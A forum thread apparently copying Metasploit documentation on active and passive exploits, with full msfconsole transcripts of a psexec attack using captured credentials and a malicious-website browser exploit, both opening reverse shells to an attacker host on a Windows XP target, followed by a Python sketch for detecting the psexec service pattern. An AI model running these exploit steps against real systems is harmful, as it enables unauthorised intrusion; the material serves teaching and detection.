Working With Active And Passive Exploits In Metasploit

DrEngerek
Trainee Moderator
2 weeks ago
#1
All exploits in the Metasploit Framework will fall into two categories: active and passive.

ACTIVE EXPLOITS


Active exploits will exploit a specific host, run until completion, and then exit.


Quote:
Brute-force modules will exit when a shell opens from the victim.
Module execution stops if an error is encountered.
You can force an active module to the background by passing ‘-j’ to the exploit command:
Code:
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
EXAMPLE

Quote:
The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system.
Code:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
PASSIVE EXPLOITS

Quote:
Passive exploits wait for incoming hosts and exploit them as they connect.

Passive exploits almost always focus on clients such as web browsers, FTP clients, etc.
They can also be used in conjunction with email exploits, waiting for connections.
Passive exploits report shells as they happen; these can be enumerated by passing ‘-l’ to the sessions command. Passing ‘-i’ will interact with a shell.
Code:
msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
Quote:
EXAMPLE
The following output shows the setup to exploit the animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.
Code:
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>
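
Added example, not part of the original post: a defender's view of the psexec transcript above, which shows an executable being written, a service created and started from it, and both removed moments later. The Python sketch below flags that short-lived lifecycle in endpoint telemetry; the event schema, the timestamps, the 60-second window and the benign `BackupAgent` rows are constructed assumptions, while `hikmEeEM.exe` and `ciWyCVEp` are the names printed in the transcript.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry in a hypothetical normalized schema:
# (timestamp, host, action, object name, service binary). Timestamps are invented;
# the names on 192.168.1.100 are the ones printed in the transcript above.
EVENTS = [
    ("2024-01-01T10:00:00", "192.168.1.100", "file_create", "hikmEeEM.exe", ""),
    ("2024-01-01T10:00:01", "192.168.1.100", "service_create", "ciWyCVEp", "hikmEeEM.exe"),
    ("2024-01-01T10:00:01", "192.168.1.100", "service_start", "ciWyCVEp", ""),
    ("2024-01-01T10:00:02", "192.168.1.100", "service_delete", "ciWyCVEp", ""),
    ("2024-01-01T10:00:02", "192.168.1.100", "file_delete", "hikmEeEM.exe", ""),
    # Benign contrast: an installer whose service and binary stay on disk.
    ("2024-01-01T11:00:00", "192.168.1.20", "file_create", "agent.exe", ""),
    ("2024-01-01T11:00:05", "192.168.1.20", "service_create", "BackupAgent", "agent.exe"),
    ("2024-01-01T11:00:06", "192.168.1.20", "service_start", "BackupAgent", ""),
]

def find_transient_services(events, window=timedelta(seconds=60)):
    """Return services that were dropped, started and cleaned up within `window`."""
    by_host = defaultdict(list)
    for ts, host, action, name, binary in events:
        by_host[host].append((datetime.fromisoformat(ts), action, name, binary))

    findings = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e[0])

        def first(action, name, lo, hi):
            # Earliest matching event on this host inside [lo, hi], else None.
            return next((t for t, a, n, _ in evs
                         if a == action and n == name and lo <= t <= hi), None)

        for created, action, svc, binary in evs:
            if action != "service_create":
                continue
            end = created + window
            steps = {
                "file_create": first("file_create", binary, created - window, created),
                "service_start": first("service_start", svc, created, end),
                "service_delete": first("service_delete", svc, created, end),
                "file_delete": first("file_delete", binary, created, end),
            }
            if None not in steps.values():
                lifetime = (steps["file_delete"] - steps["file_create"]).total_seconds()
                findings.append({"host": host, "service": svc,
                                 "binary": binary, "lifetime_s": lifetime})
    return findings

if __name__ == "__main__":
    for hit in find_transient_services(EVENTS):
        print(hit)
```

The rule keys on behaviour rather than names, so it still matches when the file and service names are randomized on every run, as they are in the transcript.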

R4V3N
Green Team (Experienced)
2 weeks ago
#2
Re: Working With Active And Passive Exploits In Metasploit
Half quote, half code..

I believe in you, but I think u don't wanna show even a lil bit of effort on translating. Why don't u start to translate somethin?